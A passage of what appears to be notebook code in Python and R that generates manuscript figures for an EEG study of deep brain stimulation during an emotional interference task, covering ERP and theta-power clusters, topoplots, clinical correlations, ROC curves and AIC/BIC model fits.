labelspacing=0.1, borderpad=0)
## Add y-labels.
if n: axes[n,m].set_xlabel('Time (s)')
sns.despine()
plt.subplots_adjust(top=0.97, left = 0.08, right = 0.98,
bottom=0.1, hspace=0.35, wspace=0.1)
plt.savefig('plots/manuscript/fig2/dacc_erp.png')
plt.savefig('plots/manuscript/fig2/dacc_erp.svg')
plt.show()
plt.close()
```
### Significant ERP Clusters
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
f = 'source/results/revised_stim_timedomain_results.csv'
df = read_csv(f)
## Limit data.
df = df[df.FDR<0.05].reset_index(drop=True)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
fig, ax = plt.subplots(1,1,figsize=(6,12))
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
for n in range(len(df)):
if df.loc[n,'Contrast'] == 'Interference': color = '#008837'
elif df.loc[n,'Contrast'] == 'nsArousal': color = '#e6550d'
else: continue
y = labels[::-1].index(df.loc[n,'Label'])
ax.fill_between(df.loc[n,['Tmin','Tmax']].astype(float), y+0.05, y+0.95, color=color, alpha=0.8)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Add legend.
for label, color in zip(['Interference','Arousal'],['#008837','#e6550d']):
ax.plot([],[],lw=10,color=color,label=label,alpha=0.7)
ax.legend(bbox_to_anchor=(0.7,1.1), handlelength=1.25, borderaxespad=0)
## Add timing details.
y1, y2 = 0, len(labels)
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
ax.text(x+0.02,0.25,s,fontsize=20)
ax.vlines(x, y1, y2, linewidth=2.5, linestyle='--',alpha=0.2)
## Fix x-axis.
xticks = np.array([0.0, 0.4, 0.9, 1.4])
ax.set(xticks=xticks, xticklabels=xticks-0.4, xlim=(-0.25,1.5),xlabel='Time (s)')
## Fix y-axis.
labels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2', 'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
ax.set(yticks=np.arange(len(labels))+0.5, yticklabels=labels[::-1], ylim=(0,len(labels)))
## Add dendrograms.
def dendrogram(ax, x, y1, y2, text):
## Parameters
lw = 2.0
alpha = 0.2
## Drawing
ax.annotate('', (x, y1), xycoords='axes fraction', xytext=(x,y2),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate('', (x*1.02,y1), xycoords='axes fraction', xytext=(-1e-3,y1),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate('', (x*1.02,y2), xycoords='axes fraction', xytext=(-1e-3,y2),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate(text, (0,0), xycoords='axes fraction', xytext=(x*1.4, np.mean([y1,y2])),
rotation=90, va='center')
dendrogram(ax, -0.38, 0, 0.495, 'Right Hemisphere')
dendrogram(ax, -0.38, 0.505, 1, 'Left Hemisphere')
sns.despine()
plt.subplots_adjust(left=0.35, right=0.975, top=0.925, bottom=0.075)
plt.savefig('plots/manuscript/fig2/all_erps.png', dpi=180)
plt.savefig('plots/manuscript/fig2/all_erps.svg', dpi=180)
plt.show()
plt.close()
```
## Figure 3
### Cluster Mass Calculations
```
import numpy as np
from pandas import read_csv, concat
combined = []
for analysis in ['stim', 'resp']:
## Load info.
df = read_csv('source/results/revised_%s_frequency_results.csv' %analysis)
df = df[(df.Contrast=='DBS') & (df.Freq=='theta') & (df.FDR<0.05)]
## Define times.
if analysis == 'stim': times = np.arange(0,1.5,1/1450.)
elif analysis == 'resp': times = np.arange(-1,1,1/1450.)
## Make events mask.
if analysis == 'stim': mask_eve = (times > 0.4) & (times < 1.127)
elif analysis == 'resp': mask_eve = (times < 0)
## Iteratively compute percentage within window.
percentages = []
for _, row in df.iterrows():
## Make significance mask.
mask_sig = np.zeros_like(times)
mask_sig += (times > row.Tmin) & (times < row.Tmax)
mask_sig = mask_sig.astype(bool)
## Compute overlap.
overlap = np.logical_and(mask_sig, mask_eve).sum() / mask_sig.sum().astype(float)
percentages.append( overlap * 1e2 )
print('%s: %0.3f' %(analysis, np.mean(percentages)))
combined.append(df)
## Compute hemisphere dominance.
combined = concat(combined)
combined['hemi'] = ['lh' if label.endswith('lh') else 'rh' for label in combined.Label]
gb = combined.groupby('hemi').Tdiff.sum()
print(gb['lh'] / gb.sum())
```
### Grand Average Topoplots (Power Domain)
```
import os
import numpy as np
import pylab as plt
from mne import concatenate_epochs, read_epochs, set_log_level
from mne.channels import read_montage
from mne.time_frequency import tfr_morlet
from mne.viz.topomap import _prepare_topo_plot
set_log_level(verbose=False)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
subjects = ['BRTU','CHDR','CRDA','JADE','JASE','M5','MEWA','S2']
analysis = 'stim'
task = 'msit'
h_freq = 50
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
montage = read_montage('standard_1020')
for analysis in ['stim','resp']:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
print 'Beginning processing for %s.' %analysis,
data = []
for subject in subjects:
## Load epochs.
epochs = read_epochs('ave/%s_%s_%s_%s-epo.fif' %(subject,task,h_freq,analysis))
## Update channel names according to montage.
ch_map = dict()
for ch in epochs.ch_names:
ix = [m.lower() for m in montage.ch_names].index(ch.lower())
ch_map[ch] = montage.ch_names[ix]
epochs.rename_channels(ch_map)
## Set montage.
epochs.set_montage(montage)
## Subtract evoked.
epochs = epochs.subtract_evoked()
## Compute evoked.
epochs.info['projs'] = []
data.append( epochs )
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Concatenate epochs.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Identify list of common channels.
channels = np.concatenate([epochs.ch_names for epochs in data])
channels = [ch for ch, count in zip(*np.unique(channels, return_counts=True))
if count==len(subjects)]
## Iteratively drop non-common channels.
for n in range(len(subjects)):
epochs = data[n]
epochs = epochs.drop_channels([ch for ch in epochs.ch_names if ch not in channels])
data[n] = epochs
data = concatenate_epochs(data)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### TFR.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Compute TFR.
freqs = np.arange(4,8+1e-6,2)
n_cycles = 3
tfr = tfr_morlet(data, freqs, n_cycles, return_itc=False, verbose=False)
## Compute baseline.
if analysis == 'stim':
mask = (tfr.times >= -0.5) & (tfr.times <= -0.1)
baseline = np.median(tfr.data[:,:,mask], axis=-1)
## Baseline correct.
data = tfr.data.copy().T / baseline.T
data = 10 * np.log10(data.T)
## Average.
data = np.apply_along_axis(np.median, 1, data).squeeze()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
_, pos, _, _, _ = _prepare_topo_plot(tfr, 'eeg', None)
np.savez_compressed('plots/manuscript/fig3/%s' %analysis, data=data, times=tfr.times, pos=pos)
print 'Done.'
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from mne.viz import plot_topomap
%matplotlib inline
for analysis, v in zip(['stim', 'resp'], [3.5, 4.5]):
## Load data.
npz = np.load('plots/manuscript/fig3/%s.npz' %analysis)
data = npz['data']
times = npz['times']
pos = npz['pos']
## Plot.
if analysis == 'stim': mask = (times > 0.4) & (times < 0.8)
elif analysis == 'resp': mask = (times > -0.2) & (times < 0.2)
plot_topomap(data[:,mask].mean(axis=-1), pos, cmap='spectral',
vmin=-v, vmax=v, contours=0)
```
### DLPFC_5-LH Theta
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set(style="white", font_scale=1.00)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters.
space = 'source'
model_name = 'revised'
label = 'dlpfc_5-lh'
freq = 'theta'
contrast = 'DBS'
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Intialize figure.
fig, axes = plt.subplots(1, 2, figsize=(12,4), dpi=300)
colors = ['#0571b0','#ca0020']
labels = ['DBS OFF','DBS ON']
for ax, analysis in zip(axes, ['stim','resp']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
## Load cluster results.
f = os.path.join(space, 'results', '%s_%s_frequency_results.csv' %(model_name, analysis))
clusters = read_csv(f)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Plot lines.
for m, color, legend in zip([0,1],colors,labels):
## Identify DBS on/off trials.
ix, = np.where(info.DBS==m)
## Compute average time course.
mu = data[ix].mean(axis=0)
## If stimulus-locked, baseline subtract.
if analysis == 'stim': mu -= mu[(times >= baseline[0])&(times <= baseline[1])].mean()
## Compute standard error.
se = data[ix].std(axis=0) / np.sqrt(len(ix))
## Plotting.
ax.plot(times, mu, linewidth=3, color=color, label=legend)
ax.fill_between(times, mu-se, mu+se, color=color, alpha=0.15)
## Plot significant clusters.
for ix in np.where((clusters.Label==label)&(clusters.Freq==freq)&
(clusters.Contrast==contrast)&(clusters.FDR<0.05))[0]:
if analysis == 'stim': y1, y2 = -1.0, 2.5
else: y1, y2 = -1.5, 1.5
tmin, tmax = clusters.loc[ix,'Tmin'], clusters.loc[ix,'Tmax']
ax.fill_between(np.linspace(tmin,tmax,1000), y1, y2, color='k', alpha=0.2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Universal fixes.
ax.set_xlabel('Time (s)', fontsize=24)
ax.tick_params(axis='both', which='major', labelsize=20)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
if analysis == 'stim':
## Fix labels/legends.
ax.set_ylabel(r' aIFG $\theta$ Power (dB)', fontsize=24)
ax.legend(loc=2, fontsize=16, frameon=False, borderpad=0)
## Fix timing.
xticks = np.array([0.0, 0.4, 0.9, 1.4])
ax.set_xticks(xticks)
ax.set_xticklabels(xticks - 0.4)
ax.set_xlim(-0.25,1.5)
## Add time markers.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
ax.text(x+0.02,-0.95,s,fontsize=16)
ax.vlines(x,y1,y2,linestyle='--',alpha=0.3)
elif analysis == 'resp':
## Add time markers.
ax.text(0.02, y1+0.05,'Resp', fontsize=16)
ax.vlines(0.0,y1,y2,linestyle='--',alpha=0.3)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Save figure.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
plt.tight_layout()
# plt.show()
plt.savefig('plots/manuscript/fig3/dlpfc_5-lh.png')
plt.savefig('plots/manuscript/fig3/dlpfc_5-lh.svg')
plt.close('all')
print 'Done.'
```
### Significant Theta Clusters
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
f = 'source/results/revised_stim_frequency_results.csv'
df = read_csv(f)
## Limit data.
df = df[df.FDR<0.05]
df = df[df.Freq=='theta'].reset_index(drop=True)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
fig, ax = plt.subplots(1,1,figsize=(6,12))
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
## Add timing details.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
ax.text(x+0.01,-0.6,s,fontsize=20)
ax.vlines(x, -1, len(labels), linewidth=2.5, linestyle='--',alpha=0.2)
conds = ['DBS','Interference']
colors = ['#ca0020','#008837']
for n, label in enumerate(labels[::-1]):
for m, contrast in enumerate(conds):
## Extract clusters.
clusters = df.loc[(df.Contrast==contrast)&(df.Label==label),['Tmin','Tmax']]
if not len(clusters): continue
## Plot clusters.
y = n + m * 0.5
for cluster in clusters.as_matrix():
ax.hlines(y+0.25, cluster.min(), cluster.max(), color=colors[m], lw=24)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Add legend.
for label, color in zip(conds,colors):
ax.plot([],[],lw=10,color=color,label=label,alpha=0.7)
ax.legend(bbox_to_anchor=(0.7,1.1), handlelength=1.25, borderaxespad=0)
## Fix x-axis.
xticks = np.array([0.0, 0.4, 0.9, 1.4])
ax.set(xticks=xticks, xticklabels=xticks-0.4, xlim=(-0.25,1.5),xlabel='Time (s)')
## Fix y-axis.
labels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2', 'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
ax.set(yticks=np.arange(len(labels))+0.5, yticklabels=labels[::-1], ylim=(-0.7,len(labels)))
## Add dendrograms.
def dendrogram(ax, x, y1, y2, text):
## Parameters
lw = 2.0
alpha = 0.2
## Drawing
ax.annotate('', (x, y1), xycoords='axes fraction', xytext=(x,y2),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate('', (x*1.02,y1), xycoords='axes fraction', xytext=(-1e-3,y1),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate('', (x*1.02,y2), xycoords='axes fraction', xytext=(-1e-3,y2),
arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
ax.annotate(text, (0,0), xycoords='axes fraction', xytext=(x*1.4, np.mean([y1,y2])),
rotation=90, fontsize=30, va='center')
dendrogram(ax, -0.38, 0.025, 0.51, 'Right Hemisphere')
dendrogram(ax, -0.38, 0.515, 1, 'Left Hemisphere')
sns.despine()
plt.subplots_adjust(left=0.35, right=0.975, top=0.925, bottom=0.075)
plt.savefig('plots/manuscript/fig3/all_theta.png', dpi=180)
plt.savefig('plots/manuscript/fig3/all_theta.svg', dpi=180)
plt.show()
```
### Spectral Barplots
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters
space = 'source'
model_name = 'revised'
contrast = 'DBS'
## Label parameters.
labels = ['dlpfc_5-lh', 'dlpfc_4-lh', 'pcc-lh']
xlabels = ['aIFG', 'aMFG 2', 'mCC']
## Define averaging parameters.
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Preallocate space.
analyses = []
freqs = []
rois = []
values = []
for analysis in ['stim','resp']:
for label, xlabel in zip(labels,xlabels):
for freq, ffreq in zip(['theta','alpha','beta'],
[r'$\theta$',r'$\alpha$',r'$\beta$']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Compute differences.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Define mask.
if analysis == 'stim': tmin, tmax = 0.4, 0.8
elif analysis == 'resp': tmin, tmax = -0.2, 0.2
## Compute averages within window.
delta = []
for i in range(2):
## Identify DBS on/off trials.
ix, = np.where(info.DBS==i)
## Compute average time course.
mu = data[ix].mean(axis=0)
## Reduce to time of interest.
mu = mu[(times >= tmin)&(times <= tmax)]
delta.append(mu)
## Compute difference.
delta = np.diff(delta, axis=0).squeeze()
## Append information.
analyses += [analysis] * len(delta)
freqs += [ffreq] * len(delta)
rois += [xlabel]* len(delta)
values += delta.tolist()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Compute differences.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Conver to DataFrame.
df = DataFrame([analyses, freqs, rois, values], index=('Analysis','Freq','ROI','Delta')).T
## Plot.
g = sns.FacetGrid(df, col='Analysis', size=6, aspect=1.5)
g.map(sns.barplot, 'ROI', 'Delta', 'Freq', ci='sd',
palette=sns.color_palette(n_colors=3))
## Add flourishes.
for n, ax in enumerate(g.axes.squeeze()):
x1, x2 = ax.get_xlim()
ax.hlines(0,x1,x2)
ax.set(xlabel = '', title='')
ax.legend(loc=1, labelspacing=0, borderpad=0)
if not n: ax.set_ylabel('Power (ON - OFF)')
plt.savefig('plots/manuscript/fig3/barplots.png', dpi=180)
plt.savefig('plots/manuscript/fig3/barplots.svg', dpi=180)
plt.show()
```
## Figure 4
### DLPFC_5-LH Correlations/ROC plots
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
import matplotlib.gridspec as gridspec
from pandas import DataFrame, Series, read_csv
from scipy.stats import pearsonr
from sklearn.metrics import auc, roc_curve
sns.set_style('white')
sns.set_context('notebook', font_scale=2)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters.
space = 'source'
model = 'revised'
analysis = 'stim'
domain = 'frequency'
contrast = 'DBS'
label = 'dlpfc_5-lh'
freq = 'theta'
fdr = 0.05
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare clinical data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
scores = read_csv('behavior/Subject_Rating_Scales.csv', index_col=0)
subjects = scores.index
madrs = scores['MADRS_Now'] - scores['MADRS_Base']
mania = scores['Hypomania']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare reaction time data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
rt = read_csv('behavior/EMOTE_behav_data.csv')
rt = rt.groupby(['DBS','subject']).origResponseTimes.mean()
rt = rt[1] - rt[0]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare power data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
## Load and limit cluster results.
results = read_csv(os.path.join(space, 'results', '%s_%s_%s_results.csv' %(model,analysis,domain)))
results = results[results.Contrast==contrast]
results = results[results.FDR<fdr]
results = results[results.Label == label].reset_index(drop=True)
## Load time series data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space, analysis, label, freq)))
data = npz['data']
times = npz['times']
## Compute condition differences.
delta = np.zeros(subjects.shape[0])
mask = (times >= results.Tmin.min()) & (times <= results.Tmax.max()) # NOTE: collapsing across clusters
for m, subject in enumerate(subjects):
i, = np.where((info['Subject']==subject)&(info[contrast]==0))
j, = np.where((info['Subject']==subject)&(info[contrast]==1))
delta[m] += (data[j][:,mask].mean(axis=0) - data[i][:,mask].mean(axis=0)).mean()
delta = Series(delta, index=subjects)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Construct DataFrame.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
np.random.seed(47404)
## Concatenate data.
df = DataFrame([madrs,mania,rt,delta], index=['MADRS','Hypomania','RT','Delta']).T
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
def swap_arr(x,y):
return y.copy(), x.copy()
def simple_roc(y,x):
'''http://blog.revolutionanalytics.com/2016/08/roc-curves-in-two-lines-of-code.html'''
assert np.all(np.in1d(y, [0,1]))
y = (y[np.argsort(x)[::-1]]).astype(bool)
return np.cumsum(y, dtype=float) / y.sum(), np.cumsum(~y, dtype=float) / (~y).sum()
def ROC(y,x):
## Compute RoC, AUC.
tpr, fpr = simple_roc(y,x)
roc_auc = auc(fpr, tpr)
## Correct for misidentification.
if roc_auc < 0.5:
roc_auc = 1 - roc_auc
tpr, fpr = swap_arr(tpr, fpr)
return tpr, fpr, roc_auc
## Initialize figure.
fig = plt.figure(figsize=(16,8))
## Define plotting variables.
colors = np.array([['#1f77b4','#2ca02c'], ['#d62728', '#9467bd']])
xticklabels = [['No Response', 'Remission'], ['No History', 'Converted']]
ylabels = [r'$\Delta$ RT (s)', r'$\Delta$ $\theta$-power (dB)']
for n, xlabel in enumerate(['MADRS', 'Hypomania']):
for m, ylabel in enumerate(['RT','Delta']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Preparations.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Initialize axes.
if not n: top, bottom = 0.95, 0.6
else: top, bottom = 0.4, 0.05
if not m: left, right = 0.05, 0.435
else: left, right = 0.565, 0.95
gs = gridspec.GridSpec(1,2)
gs.update(left=left, right=right, top=top, bottom=bottom, wspace=0.4)
## Extract variables.
x, y = df[[xlabel,ylabel]].dropna().as_matrix().T
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Correlation Plot.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Plot correlation.
ax = plt.subplot(gs[0])
sns.regplot(x, y, df, color=colors[n,m], ax=ax)
## Add flourishes.
if not n and not m: ax.set(xticks=[-40,-20,0], xlabel=r'$\Delta$ MADRS')
elif not n: ax.set(xticks=[-26,-13,0], xlabel=r'$\Delta$ MADRS')
else: ax.set(xticks=[0,1], xticklabels=xticklabels[n])
if not m: ax.set(ylim=(-0.15, 0.10), yticks=[-0.10,0.0,0.10],
ylabel=ylabels[m])
else: ax.set(ylim=(-0.5,2), yticks=np.linspace(-0.5,2,3),
ylabel=ylabels[m])
ax.tick_params(axis='x', which='major', pad=15)
## Add text.
r, p = pearsonr(x,y)
if not m and n:
ax.annotate('r = %0.2f, p = %0.2f' %(r,p), xy=(0,0), xytext=(0.05,0.05),
xycoords = 'axes fraction', fontsize=16)
else:
ax.annotate('r = %0.2f, p = %0.2f' %(r,p), xy=(0,0), xytext=(0.3,0.05),
xycoords = 'axes fraction', fontsize=16)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### RoC plots.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
if xlabel == 'MADRS':
x = np.where(scores['MADRS_Now'] / scores['MADRS_Base'] > 0.5, 0, 1)
x = x[df[ylabel].notnull()]
## Initialize plot.
ax = plt.subplot(gs[1])
ax.plot(np.linspace(0,1,10),np.linspace(0,1,10),lw=1,linestyle='--',color='k')
## Plot true RoC.
tpr, fpr, roc_auc = ROC(x, y)
ax.plot(fpr, tpr, lw=2, color=colors[n,m])
auc_sim = []
for i in range(1000):
## Shuffle values.
if i: ix = np.random.choice(np.arange(len(x)), len(x), replace=True)
else: ix = np.arange(len(x))
x_p, y_p = x[ix].copy(), y[ix].copy()
## Compute AUC.
_, _, sim = ROC(x_p, y_p)
auc_sim.append( sim )
## Plot bootstrapped CI.
text = 'AUC = %0.2f [%0.2f, %0.2f]' %(roc_auc, np.nanpercentile(auc_sim, 2.5),
np.nanpercentile(auc_sim, 97.5))
ax.annotate(text, xy=(0,0), xytext=(0.15,0.05), xycoords = 'axes fraction',
fontsize=16)
## Add flourishes.
ax.set(xticks=np.linspace(0,1,3), xlim=(-0.01,1.00), xlabel='FPR',
yticks=np.linspace(0,1,3), ylim=(0.00,1.01), ylabel='TPR')
sns.despine()
plt.savefig('plots/manuscript/fig4/combo_plot.png')
plt.savefig('plots/manuscript/fig4/combo_plot.svg')
```
## Supplementary Figures
### Figure S3: AIC Plot
```
import rpy2
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2)
%load_ext rpy2.ipython
%R require(lme4)
%matplotlib inline
## Load data.
df = read_csv('behavior/EMOTE_behav_data.csv')
df = df[np.where(df.responseTimes,True,False)].reset_index(drop=True)
df['DBSxInt'] = df.DBS * df.interference
df['AROxVAL'] = df.arousal * df.valence
%%R -i df -o AICs,BICs
formula = 'responseTimes ~ (1|subject)'
variables = c('interference','DBS','valence','arousal','TrialNum', 'AROxVAL')
AICs = c()
BICs = c()
for (variable in variables){
formula = paste(formula, variable, sep=' + ')
model = glmer(formula, data=df, family=Gamma(link='inverse'))
AICs = c(AICs, AIC(model))
BICs = c(BICs, BIC(model))
}
## Build dataframe
variables = np.array(['Interference','DBS','Valence','Arousal','Trial #',r'Arousal $\cdot$ Valence'] * 2)
metrics = np.concatenate([ ['AIC'] * 6, ['BIC'] * 6 ])
fits = DataFrame(dict(Fit = np.concatenate([AICs,BICs]),
Model = variables,
Metric = metrics))
fits.Fit = np.sign(fits.Fit) * np.log(np.abs(fits.Fit))
## Plotting
fig, ax = plt.subplots(1,1,figsize=(10,5))
sns.set(style="white", font_scale=1.75)
g = sns.pointplot(x='Model', y='Fit', hue='Metric', data=fits,
palette='colorblind', kind='point', ax=ax, legend=1)
## Flourishes
ax.legend_.set_title(None)
ax.set(xlabel='', yticks=[-8.52, -8.50, -8.48])
